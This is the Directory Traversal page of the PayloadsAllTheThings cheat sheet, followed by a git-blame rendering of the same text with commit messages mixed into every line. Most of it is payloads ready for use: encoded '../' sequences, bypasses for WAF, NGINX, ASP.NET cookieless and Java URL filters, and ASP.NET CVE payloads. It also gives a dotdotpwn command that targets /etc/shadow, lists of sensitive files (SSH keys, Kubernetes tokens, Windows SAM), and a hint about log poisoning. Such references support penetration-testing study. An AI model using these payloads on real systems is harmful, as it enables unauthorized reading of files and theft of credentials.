PayloadsAllTheThings/Directory Traversal/README.md

# Directory Traversal

> Path Traversal, also known as Directory Traversal, is a type of security vulnerability that occurs when an attacker manipulates variables that reference files with “dot-dot-slash (../)” sequences or similar constructs. This can allow the attacker to access arbitrary files and directories stored on the file system.

## Summary

* [Tools](#tools)
* [Methodology](#methodology)
    * [16 bits Unicode encoding](#16-bits-unicode-encoding)
    * [UTF-8 Unicode encoding](#utf-8-unicode-encoding)
    * [Bypass "../" replaced by ""](#bypass--replaced-by-)
    * [Bypass "../" with ";"](#bypass--with-)
    * [Double URL encoding](#double-url-encoding)
    * [UNC Bypass](#unc-bypass)
    * [NGINX/ALB Bypass](#nginxalb-bypass)
    * [ASPNET Cookieless Bypass](#aspnet-cookieless-bypass)
    * [IIS Short Name](#iis-short-name)
* [Path Traversal](#path-traversal)
    * [Interesting Linux files](#interesting-linux-files)
    * [Interesting Windows files](#interesting-windows-files)
* [Labs](#labs)
* [References](#references)


## Tools

- [wireghoul/dotdotpwn](https://github.com/wireghoul/dotdotpwn) - The Directory Traversal Fuzzer 
    ```powershell
    perl dotdotpwn.pl -h 10.10.10.10 -m ftp -t 300 -f /etc/shadow -s -q -b
    ```


## Methodology

We can use the `..` characters to access the parent directory, the following strings are several encoding that can help you bypass a poorly implemented filter.

```powershell
../
..\
..\/
%2e%2e%2f
%252e%252e%252f
%c0%ae%c0%ae%c0%af
%uff0e%uff0e%u2215
%uff0e%uff0e%u2216
```

### 16 bits Unicode encoding

```powershell
. = %u002e
/ = %u2215
\ = %u2216
```

### UTF-8 Unicode encoding

```powershell
. = %c0%2e, %e0%40%ae, %c0ae
/ = %c0%af, %e0%80%af, %c0%2f
\ = %c0%5c, %c0%80%5c
```

### Bypass "../" replaced by ""

Sometimes you encounter a WAF which remove the `../` characters from the strings, just duplicate them.

```powershell
..././
...\.\
```

### Bypass "../" with ";"

```powershell
..;/
http://domain.tld/page.jsp?include=..;/..;/sensitive.txt 
```


### Double URL encoding

```powershell
. = %252e
/ = %252f
\ = %255c
```

**e.g:** Spring MVC Directory Traversal Vulnerability (CVE-2018-1271) with `http://localhost:8080/spring-mvc-showcase/resources/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini`


### UNC Bypass

An attacker can inject a Windows UNC share ('\\UNC\share\name') into a software system to potentially redirect access to an unintended location or arbitrary file.

```powershell
\\localhost\c$\windows\win.ini
```


### NGINX/ALB Bypass

NGINX in certain configurations and ALB can block traversal attacks in the route, For example:
```http://nginx-server/../../``` will return a 400 bad request.

To bypass this behaviour just add forward slashes in front of the url:
```http://nginx-server////////../../```


### ASP NET Cookieless Bypass

When cookieless session state is enabled. Instead of relying on a cookie to identify the session, ASP.NET modifies the URL by embedding the Session ID directly into it.

For example, a typical URL might be transformed from: `http://example.com/page.aspx` to something like: `http://example.com/(S(lit3py55t21z5v55vlm25s55))/page.aspx`. The value within `(S(...))` is the Session ID. 


| .NET Version   | URI                        |
| -------------- | -------------------------- |
| V1.0, V1.1     | /(XXXXXXXX)/               |
| V2.0+          | /(S(XXXXXXXX))/            |
| V2.0+          | /(A(XXXXXXXX)F(YYYYYYYY))/ |
| V2.0+          | ...                        |


We can use this behavior to bypass filtered URLs.

* If your application is in the main folder
    ```ps1
    /(S(X))/
    /(Y(Z))/
    /(G(AAA-BBB)D(CCC=DDD)E(0-1))/
    /(S(X))/admin/(S(X))/main.aspx
    /(S(x))/b/(S(x))in/Navigator.dll
    ```

* If your application is in a subfolder
    ```ps1
    /MyApp/(S(X))/
    /admin/(S(X))/main.aspx
    /admin/Foobar/(S(X))/../(S(X))/main.aspx
    ```


| CVE            | Payload                                        |
| -------------- | ---------------------------------------------- |
| CVE-2023-36899 | /WebForm/(S(X))/prot/(S(X))ected/target1.aspx  |
| -              | /WebForm/(S(X))/b/(S(X))in/target2.aspx        |
| CVE-2023-36560 | /WebForm/pro/(S(X))tected/target1.aspx/(S(X))/ |
| -              | /WebForm/b/(S(X))in/target2.aspx/(S(X))/       |


### IIS Short Name

* [irsdl/IIS-ShortName-Scanner](https://github.com/irsdl/IIS-ShortName-Scanner)

```ps1
java -jar ./iis_shortname_scanner.jar 20 8 'https://X.X.X.X/bin::$INDEX_ALLOCATION/'
java -jar ./iis_shortname_scanner.jar 20 8 'https://X.X.X.X/MyApp/bin::$INDEX_ALLOCATION/'
```


### Java Bypass

Bypass Java's URL protocol

```powershell
url:file:///etc/passwd
url:http://127.0.0.1:8080
```


## Path Traversal

### Interesting Linux files

```powershell
/etc/issue
/etc/passwd
/etc/shadow
/etc/group
/etc/hosts
/etc/motd
/etc/mysql/my.cnf
/proc/[0-9]*/fd/[0-9]*   (first number is the PID, second is the filedescriptor)
/proc/self/environ
/proc/version
/proc/cmdline
/proc/sched_debug
/proc/mounts
/proc/net/arp
/proc/net/route
/proc/net/tcp
/proc/net/udp
/proc/self/cwd/index.php
/proc/self/cwd/main.py
/home/$USER/.bash_history
/home/$USER/.ssh/id_rsa
/run/secrets/kubernetes.io/serviceaccount/token
/run/secrets/kubernetes.io/serviceaccount/namespace
/run/secrets/kubernetes.io/serviceaccount/certificate
/var/run/secrets/kubernetes.io/serviceaccount
/var/lib/mlocate/mlocate.db
/var/lib/plocate/plocate.db
/var/lib/mlocate.db
```

### Interesting Windows files

Always existing file in recent Windows machine. 
Ideal to test path traversal but nothing much interesting inside...

```powershell
c:\windows\system32\license.rtf
c:\windows\system32\eula.txt
```

Interesting files to check out (Extracted from https://github.com/soffensive/windowsblindread)

```powershell
c:/boot.ini
c:/inetpub/logs/logfiles
c:/inetpub/wwwroot/global.asa
c:/inetpub/wwwroot/index.asp
c:/inetpub/wwwroot/web.config
c:/sysprep.inf
c:/sysprep.xml
c:/sysprep/sysprep.inf
c:/sysprep/sysprep.xml
c:/system32/inetsrv/metabase.xml
c:/sysprep.inf
c:/sysprep.xml
c:/sysprep/sysprep.inf
c:/sysprep/sysprep.xml
c:/system volume information/wpsettings.dat
c:/system32/inetsrv/metabase.xml
c:/unattend.txt
c:/unattend.xml
c:/unattended.txt
c:/unattended.xml
c:/windows/repair/sam
c:/windows/repair/system
```

The following log files are controllable and can be included with an evil payload to achieve a command execution

```powershell
/var/log/apache/access.log
/var/log/apache/error.log
/var/log/httpd/error_log
/usr/local/apache/log/error_log
/usr/local/apache2/log/error_log
/var/log/nginx/access.log
/var/log/nginx/error.log
/var/log/vsftpd.log
/var/log/sshd.log
/var/log/mail
```


## Labs

* [PortSwigger - File path traversal, simple case](https://portswigger.net/web-security/file-path-traversal/lab-simple)
* [PortSwigger - File path traversal, traversal sequences blocked with absolute path bypass](https://portswigger.net/web-security/file-path-traversal/lab-absolute-path-bypass)
* [PortSwigger - File path traversal, traversal sequences stripped non-recursively](https://portswigger.net/web-security/file-path-traversal/lab-sequences-stripped-non-recursively)
* [PortSwigger - File path traversal, traversal sequences stripped with superfluous URL-decode](https://portswigger.net/web-security/file-path-traversal/lab-superfluous-url-decode)
* [PortSwigger - File path traversal, validation of start of path](https://portswigger.net/web-security/file-path-traversal/lab-validate-start-of-path)
* [PortSwigger - File path traversal, validation of file extension with null byte bypass](https://portswigger.net/web-security/file-path-traversal/lab-validate-file-extension-null-byte-bypass)


## References

- [Path Traversal Cheat Sheet: Windows - @HollyGraceful - May 17, 2015](https://web.archive.org/web/20170123115404/https://gracefulsecurity.com/path-traversal-cheat-sheet-windows/)
- [Directory traversal attack - Wikipedia - 5 August 2024](https://en.wikipedia.org/wiki/Directory_traversal_attack)
- [CWE-40: Path Traversal: '\\UNC\share\name\' (Windows UNC Share) - CWE Mitre - December 27, 2018](https://cwe.mitre.org/data/definitions/40.html)
- [NGINX may be protecting your applications from traversal attacks without you even knowing - Rotem Bar - September 24, 2020](https://medium.com/appsflyer/nginx-may-be-protecting-your-applications-from-traversal-attacks-without-you-even-knowing-b08f882fd43d?source=friends_link&sk=e9ddbadd61576f941be97e111e953381)
- [Directory traversal - Portswigger - March 30, 2019](https://portswigger.net/web-security/file-path-traversal)
- [Cookieless ASPNET - Soroush Dalili - March 27, 2023](https://twitter.com/irsdl/status/1640390106312835072)
- [EP 057 | Proc filesystem tricks & locatedb abuse with @_remsio_ & @_bluesheet - TheLaluka - November 30, 2023](https://youtu.be/YlZGJ28By8U)
- [Understand How the ASP.NET Cookieless Feature Works - Microsoft Documentation - June 24, 2011](https://learn.microsoft.com/en-us/previous-versions/dotnet/articles/aa479315(v=msdn.10))
Normalize Titles 2022-10-12 10:13:55 +00:00			`# Directory Traversal`
Directory traversal / File inclusion rewritten 2018-12-27 23:27:15 +00:00
LFI with pearcmd.php 2023-10-02 10:52:10 +00:00			`> Path Traversal, also known as Directory Traversal, is a type of security vulnerability that occurs when an attacker manipulates variables that reference files with “dot-dot-slash (../)” sequences or similar constructs. This can allow the attacker to access arbitrary files and directories stored on the file system.`
Directory traversal / File inclusion rewritten 2018-12-27 23:27:15 +00:00
			`## Summary`

Linux PrivEsc + SSH persistency 2019-06-09 14:05:44 +00:00			`* [Tools](#tools)`
Normalize page header for CSRF, DNS, DOS, Dependencies 2024-11-10 10:18:46 +00:00			`* [Methodology](#methodology)`
Fixed Broken Links in Directory traversal 2019-12-17 17:05:35 +00:00			`* [16 bits Unicode encoding](#16-bits-unicode-encoding)`
			`* [UTF-8 Unicode encoding](#utf-8-unicode-encoding)`
			`* [Bypass "../" replaced by ""](#bypass--replaced-by-)`
			`* [Bypass "../" with ";"](#bypass--with-)`
			`* [Double URL encoding](#double-url-encoding)`
Fix typo in PHP Object injection 2019-07-05 16:42:42 +00:00			`* [UNC Bypass](#unc-bypass)`
Added traversal bypass of nginx/alb 2020-10-04 09:42:51 +00:00			`* [NGINX/ALB Bypass](#nginxalb-bypass)`
ASPNET Cookieless Bypass 2023-09-02 21:01:10 +00:00			`* [ASPNET Cookieless Bypass](#aspnet-cookieless-bypass)`
ASP Cookieless + ReDOS backtrack 2024-05-29 21:23:51 +00:00			`* [IIS Short Name](#iis-short-name)`
Directory traversal / File inclusion rewritten 2018-12-27 23:27:15 +00:00			`* [Path Traversal](#path-traversal)`
Fixed Broken Links in Directory traversal 2019-12-17 17:05:35 +00:00			`* [Interesting Linux files](#interesting-linux-files)`
			`* [Interesting Windows files](#interesting-windows-files)`
References updated for Dom Clobbering, File Inclusion 2024-11-05 16:29:15 +00:00			`* [Labs](#labs)`
Pspy + Silver Ticket + MSSQL connect 2019-08-18 20:24:48 +00:00			`* [References](#references)`
Directory traversal / File inclusion rewritten 2018-12-27 23:27:15 +00:00
Normalize page header for CSRF, DNS, DOS, Dependencies 2024-11-10 10:18:46 +00:00
Linux PrivEsc + SSH persistency 2019-06-09 14:05:44 +00:00			`## Tools`

Normalize page header for CSRF, DNS, DOS, Dependencies 2024-11-10 10:18:46 +00:00			`- [wireghoul/dotdotpwn](https://github.com/wireghoul/dotdotpwn) - The Directory Traversal Fuzzer`
Linux PrivEsc + SSH persistency 2019-06-09 14:05:44 +00:00			```powershell
			`perl dotdotpwn.pl -h 10.10.10.10 -m ftp -t 300 -f /etc/shadow -s -q -b`
			```

Normalize page header for CSRF, DNS, DOS, Dependencies 2024-11-10 10:18:46 +00:00
			`## Methodology`
Directory traversal / File inclusion rewritten 2018-12-27 23:27:15 +00:00
			We can use the `..` characters to access the parent directory, the following strings are several encoding that can help you bypass a poorly implemented filter.

			```powershell
			`../`
			`..\`
			`..\/`
			`%2e%2e%2f`
			`%252e%252e%252f`
			`%c0%ae%c0%ae%c0%af`
			`%uff0e%uff0e%u2215`
			`%uff0e%uff0e%u2216`
			```

Fix typo in PHP Object injection 2019-07-05 16:42:42 +00:00			`### 16 bits Unicode encoding`
Directory traversal / File inclusion rewritten 2018-12-27 23:27:15 +00:00
			```powershell
			`. = %u002e`
			`/ = %u2215`
			`\ = %u2216`
			```

Fix typo in PHP Object injection 2019-07-05 16:42:42 +00:00			`### UTF-8 Unicode encoding`
Directory traversal / File inclusion rewritten 2018-12-27 23:27:15 +00:00
			```powershell
			`. = %c0%2e, %e0%40%ae, %c0ae`
			`/ = %c0%af, %e0%80%af, %c0%2f`
			`\ = %c0%5c, %c0%80%5c`
			```

Fix typo in PHP Object injection 2019-07-05 16:42:42 +00:00			`### Bypass "../" replaced by ""`
LFI with pearcmd.php 2023-10-02 10:52:10 +00:00
			Sometimes you encounter a WAF which remove the `../` characters from the strings, just duplicate them.
Directory traversal / File inclusion rewritten 2018-12-27 23:27:15 +00:00
			```powershell
			`..././`
			`...\.\`
			```

Pspy + Silver Ticket + MSSQL connect 2019-08-18 20:24:48 +00:00			`### Bypass "../" with ";"`

			```powershell
			`..;/`
			`http://domain.tld/page.jsp?include=..;/..;/sensitive.txt`
			```

ASPNET Cookieless Bypass 2023-09-02 21:01:10 +00:00
Fix typo in PHP Object injection 2019-07-05 16:42:42 +00:00			`### Double URL encoding`
Directory traversal / File inclusion rewritten 2018-12-27 23:27:15 +00:00
			```powershell
			`. = %252e`
			`/ = %252f`
			`\ = %255c`
			```

Directory Traversal CVE 2018 Spring 2019-07-27 11:02:16 +00:00			e.g: Spring MVC Directory Traversal Vulnerability (CVE-2018-1271) with `http://localhost:8080/spring-mvc-showcase/resources/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini`

ASPNET Cookieless Bypass 2023-09-02 21:01:10 +00:00
Fix typo in PHP Object injection 2019-07-05 16:42:42 +00:00			`### UNC Bypass`

			`An attacker can inject a Windows UNC share ('\\UNC\share\name') into a software system to potentially redirect access to an unintended location or arbitrary file.`

			```powershell
			`\\localhost\c$\windows\win.ini`
			```

ASPNET Cookieless Bypass 2023-09-02 21:01:10 +00:00
Added traversal bypass of nginx/alb 2020-10-04 09:42:51 +00:00			`### NGINX/ALB Bypass`

			`NGINX in certain configurations and ALB can block traversal attacks in the route, For example:`
			```http://nginx-server/../../``` will return a 400 bad request.

			`To bypass this behaviour just add forward slashes in front of the url:`
			```http://nginx-server////////../../```

Directory traversal / File inclusion rewritten 2018-12-27 23:27:15 +00:00
ASP Cookieless + ReDOS backtrack 2024-05-29 21:23:51 +00:00			`### ASP NET Cookieless Bypass`
ASPNET Cookieless Bypass 2023-09-02 21:01:10 +00:00
			`When cookieless session state is enabled. Instead of relying on a cookie to identify the session, ASP.NET modifies the URL by embedding the Session ID directly into it.`

			For example, a typical URL might be transformed from: `http://example.com/page.aspx` to something like: `http://example.com/(S(lit3py55t21z5v55vlm25s55))/page.aspx`. The value within `(S(...))` is the Session ID.

ASP Cookieless + ReDOS backtrack 2024-05-29 21:23:51 +00:00
			`\| .NET Version \| URI \|`
			`\| -------------- \| -------------------------- \|`
			`\| V1.0, V1.1 \| /(XXXXXXXX)/ \|`
			`\| V2.0+ \| /(S(XXXXXXXX))/ \|`
			`\| V2.0+ \| /(A(XXXXXXXX)F(YYYYYYYY))/ \|`
			`\| V2.0+ \| ... \|`


ASPNET Cookieless Bypass 2023-09-02 21:01:10 +00:00			`We can use this behavior to bypass filtered URLs.`

ASP Cookieless + ReDOS backtrack 2024-05-29 21:23:51 +00:00			`* If your application is in the main folder`
			```ps1
			`/(S(X))/`
			`/(Y(Z))/`
			`/(G(AAA-BBB)D(CCC=DDD)E(0-1))/`
			`/(S(X))/admin/(S(X))/main.aspx`
			`/(S(x))/b/(S(x))in/Navigator.dll`
			```

			`* If your application is in a subfolder`
			```ps1
			`/MyApp/(S(X))/`
			`/admin/(S(X))/main.aspx`
			`/admin/Foobar/(S(X))/../(S(X))/main.aspx`
			```


			`\| CVE \| Payload \|`
			`\| -------------- \| ---------------------------------------------- \|`
			`\| CVE-2023-36899 \| /WebForm/(S(X))/prot/(S(X))ected/target1.aspx \|`
			`\| - \| /WebForm/(S(X))/b/(S(X))in/target2.aspx \|`
			`\| CVE-2023-36560 \| /WebForm/pro/(S(X))tected/target1.aspx/(S(X))/ \|`
			`\| - \| /WebForm/b/(S(X))in/target2.aspx/(S(X))/ \|`


			`### IIS Short Name`

			`* [irsdl/IIS-ShortName-Scanner](https://github.com/irsdl/IIS-ShortName-Scanner)`

			```ps1
			`java -jar ./iis_shortname_scanner.jar 20 8 'https://X.X.X.X/bin::$INDEX_ALLOCATION/'`
			`java -jar ./iis_shortname_scanner.jar 20 8 'https://X.X.X.X/MyApp/bin::$INDEX_ALLOCATION/'`
ASPNET Cookieless Bypass 2023-09-02 21:01:10 +00:00			```


MSSQL Agent Command Execution 2022-03-10 10:05:17 +00:00			`### Java Bypass`

			`Bypass Java's URL protocol`

			```powershell
			`url:file:///etc/passwd`
			`url:http://127.0.0.1:8080`
			```


Directory traversal / File inclusion rewritten 2018-12-27 23:27:15 +00:00			`## Path Traversal`

Fix typo in PHP Object injection 2019-07-05 16:42:42 +00:00			`### Interesting Linux files`
Directory traversal / File inclusion rewritten 2018-12-27 23:27:15 +00:00
			```powershell
			`/etc/issue`
			`/etc/passwd`
			`/etc/shadow`
			`/etc/group`
			`/etc/hosts`
			`/etc/motd`
			`/etc/mysql/my.cnf`
			`/proc/[0-9]/fd/[0-9] (first number is the PID, second is the filedescriptor)`
			`/proc/self/environ`
			`/proc/version`
			`/proc/cmdline`
			`/proc/sched_debug`
			`/proc/mounts`
			`/proc/net/arp`
			`/proc/net/route`
			`/proc/net/tcp`
			`/proc/net/udp`
Fix typo in PHP Object injection 2019-07-05 16:42:42 +00:00			`/proc/self/cwd/index.php`
			`/proc/self/cwd/main.py`
			`/home/$USER/.bash_history`
			`/home/$USER/.ssh/id_rsa`
Net-NTLMv1 + DriverPrinter 2021-09-06 18:58:44 +00:00			`/run/secrets/kubernetes.io/serviceaccount/token`
			`/run/secrets/kubernetes.io/serviceaccount/namespace`
			`/run/secrets/kubernetes.io/serviceaccount/certificate`
Fix typo in PHP Object injection 2019-07-05 16:42:42 +00:00			`/var/run/secrets/kubernetes.io/serviceaccount`
AD mitigations 2019-12-26 11:09:23 +00:00			`/var/lib/mlocate/mlocate.db`
plocate and Azure AD updates 2023-12-01 21:21:05 +00:00			`/var/lib/plocate/plocate.db`
AD mitigations 2019-12-26 11:09:23 +00:00			`/var/lib/mlocate.db`
Directory traversal / File inclusion rewritten 2018-12-27 23:27:15 +00:00			```

Fix typo in PHP Object injection 2019-07-05 16:42:42 +00:00			`### Interesting Windows files`

Add useful always existing windows file Adding always existing file in recent Windows machine. Ideal to test path traversal but nothing much interesting inside 2020-06-23 14:26:46 +00:00			`Always existing file in recent Windows machine.`
			`Ideal to test path traversal but nothing much interesting inside...`

			```powershell
			`c:\windows\system32\license.rtf`
			`c:\windows\system32\eula.txt`
			```

Fix typo in PHP Object injection 2019-07-05 16:42:42 +00:00			`Interesting files to check out (Extracted from https://github.com/soffensive/windowsblindread)`
Directory traversal / File inclusion rewritten 2018-12-27 23:27:15 +00:00
			```powershell
			`c:/boot.ini`
			`c:/inetpub/logs/logfiles`
			`c:/inetpub/wwwroot/global.asa`
			`c:/inetpub/wwwroot/index.asp`
			`c:/inetpub/wwwroot/web.config`
			`c:/sysprep.inf`
			`c:/sysprep.xml`
			`c:/sysprep/sysprep.inf`
			`c:/sysprep/sysprep.xml`
			`c:/system32/inetsrv/metabase.xml`
			`c:/sysprep.inf`
			`c:/sysprep.xml`
			`c:/sysprep/sysprep.inf`
			`c:/sysprep/sysprep.xml`
			`c:/system volume information/wpsettings.dat`
			`c:/system32/inetsrv/metabase.xml`
			`c:/unattend.txt`
			`c:/unattend.xml`
			`c:/unattended.txt`
			`c:/unattended.xml`
Update README.md 2019-10-29 08:23:39 +00:00			`c:/windows/repair/sam`
			`c:/windows/repair/system`
Directory traversal / File inclusion rewritten 2018-12-27 23:27:15 +00:00			```

			`The following log files are controllable and can be included with an evil payload to achieve a command execution`

			```powershell
			`/var/log/apache/access.log`
			`/var/log/apache/error.log`
			`/var/log/httpd/error_log`
			`/usr/local/apache/log/error_log`
			`/usr/local/apache2/log/error_log`
Add nginx log files for LFI log poisoning 2019-05-30 10:01:24 +00:00			`/var/log/nginx/access.log`
			`/var/log/nginx/error.log`
Directory traversal / File inclusion rewritten 2018-12-27 23:27:15 +00:00			`/var/log/vsftpd.log`
			`/var/log/sshd.log`
			`/var/log/mail`
			```
plocate and Azure AD updates 2023-12-01 21:21:05 +00:00

Update 2022-10-02 06:13:01 +00:00			`## Labs`

Normalize page header for CSRF, DNS, DOS, Dependencies 2024-11-10 10:18:46 +00:00			`* [PortSwigger - File path traversal, simple case](https://portswigger.net/web-security/file-path-traversal/lab-simple)`
			`* [PortSwigger - File path traversal, traversal sequences blocked with absolute path bypass](https://portswigger.net/web-security/file-path-traversal/lab-absolute-path-bypass)`
			`* [PortSwigger - File path traversal, traversal sequences stripped non-recursively](https://portswigger.net/web-security/file-path-traversal/lab-sequences-stripped-non-recursively)`
			`* [PortSwigger - File path traversal, traversal sequences stripped with superfluous URL-decode](https://portswigger.net/web-security/file-path-traversal/lab-superfluous-url-decode)`
			`* [PortSwigger - File path traversal, validation of start of path](https://portswigger.net/web-security/file-path-traversal/lab-validate-start-of-path)`
			`* [PortSwigger - File path traversal, validation of file extension with null byte bypass](https://portswigger.net/web-security/file-path-traversal/lab-validate-file-extension-null-byte-bypass)`
Directory traversal / File inclusion rewritten 2018-12-27 23:27:15 +00:00
plocate and Azure AD updates 2023-12-01 21:21:05 +00:00
Directory traversal / File inclusion rewritten 2018-12-27 23:27:15 +00:00			`## References`

References updated for Dom Clobbering, File Inclusion 2024-11-05 16:29:15 +00:00			`- [Path Traversal Cheat Sheet: Windows - @HollyGraceful - May 17, 2015](https://web.archive.org/web/20170123115404/https://gracefulsecurity.com/path-traversal-cheat-sheet-windows/)`
			`- [Directory traversal attack - Wikipedia - 5 August 2024](https://en.wikipedia.org/wiki/Directory_traversal_attack)`
			`- [CWE-40: Path Traversal: '\\UNC\share\name\' (Windows UNC Share) - CWE Mitre - December 27, 2018](https://cwe.mitre.org/data/definitions/40.html)`
			`- [NGINX may be protecting your applications from traversal attacks without you even knowing - Rotem Bar - September 24, 2020](https://medium.com/appsflyer/nginx-may-be-protecting-your-applications-from-traversal-attacks-without-you-even-knowing-b08f882fd43d?source=friends_link&sk=e9ddbadd61576f941be97e111e953381)`
			`- [Directory traversal - Portswigger - March 30, 2019](https://portswigger.net/web-security/file-path-traversal)`
			`- [Cookieless ASPNET - Soroush Dalili - March 27, 2023](https://twitter.com/irsdl/status/1640390106312835072)`
			`- [EP 057 \| Proc filesystem tricks & locatedb abuse with @_remsio_ & @_bluesheet - TheLaluka - November 30, 2023](https://youtu.be/YlZGJ28By8U)`
			`- [Understand How the ASP.NET Cookieless Feature Works - Microsoft Documentation - June 24, 2011](https://learn.microsoft.com/en-us/previous-versions/dotnet/articles/aa479315(v=msdn.10))`